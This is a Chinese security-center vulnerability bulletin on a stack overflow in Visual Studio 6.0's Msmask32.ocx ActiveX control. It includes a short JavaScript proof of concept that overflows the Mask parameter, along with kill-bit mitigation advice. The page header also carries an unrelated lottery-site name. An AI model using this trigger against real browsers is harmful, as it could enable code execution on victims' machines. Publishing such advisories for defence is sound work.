当前位置: 财神彩票聊天报码室 - 检测评估 - 安徽省信息安全测评中心 - 漏洞通报
发表日期:2008年9月1日 编辑:admin 有5447位读者读过此文 【字体:
Microsoft VS Msmask32.ocx ActiveX控件栈溢出漏洞
受影响系统:

Microsoft Visual Studio 6.0

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 30124

Microsoft Visual Studio是微软公司的开发工具套件系列产品,是一个基本完整的开发工具集,包括了软件整个生命周期中所需要的大部分工具。

Visual Studio所安装的Masked Edit ActiveX控件(Msmask32.ocx)没有正确地初始化带有超长Mask参数的对象,如果用户受骗访问了恶意网页的话就可能触发栈溢出,导致执行任意代码。

<*来源:Symantec

链接:http://secunia.com/advisories/31498/

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"

width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';

for (i=1;i<=1945;i++){buf=buf+unescape("%0C");}

document.write(body+buf+body1);

建议:

--------------------------------------------------------------------------------

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 为CLSID:C932BA85-4374-101B-A56C-00AA003668DC设置kill bit。

厂商补丁:

Microsoft

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/



相关专题:

相关信息:
 没有相关信息

相关评论:
 没有相关评论
 
  发表、查看更多关于该信息的评论 将本信息发给好友 打印本页
 
 

  
单位地址: 中国安徽合肥市大西门赵岗路12号(琥珀山庄南入口处)
电话: 0551-62810945 62824812 转8106 传真: 0551-62816393
网站新闻投稿箱: [email protected] § §